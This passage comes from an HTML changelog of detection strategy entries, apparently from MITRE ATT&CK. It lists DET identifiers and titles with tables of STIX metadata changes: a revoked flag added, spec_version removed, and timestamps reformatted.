value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0493] Detect Abuse of Inter-Process Communication (T1559)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0122] Detect Abuse of Windows Time Providers for Persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0335] Detect Abuse of XPC Services (T1559.003)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0535] Detect Abuse of vSphere Installation Bundles (VIBs) for Persistent Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0381] Detect Access and Decryption of Group Policy Preference (GPP) Credentials in SYSVOL</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0385] Detect Access and Parsing of .bash_history Files for Credential Harvesting</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0412] Detect Access or Search for Unsecured Credentials Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0001] Detect Access to Cloud Instance Metadata API (IaaS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0307] Detect Access to Unsecured Credential Files Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0396] Detect Access to macOS Keychain for Credential Theft</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0312] Detect Active Setup Persistence via StubPath Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0275] Detect Adversary Deobfuscation or Decoding of Files and Payloads</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0296] Detect Adversary-in-the-Middle via Network and Configuration Anomalies</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0526] Detect Archiving and Encryption of Collected Data (T1560)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0438] Detect Archiving via Custom Method (T1560.003)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 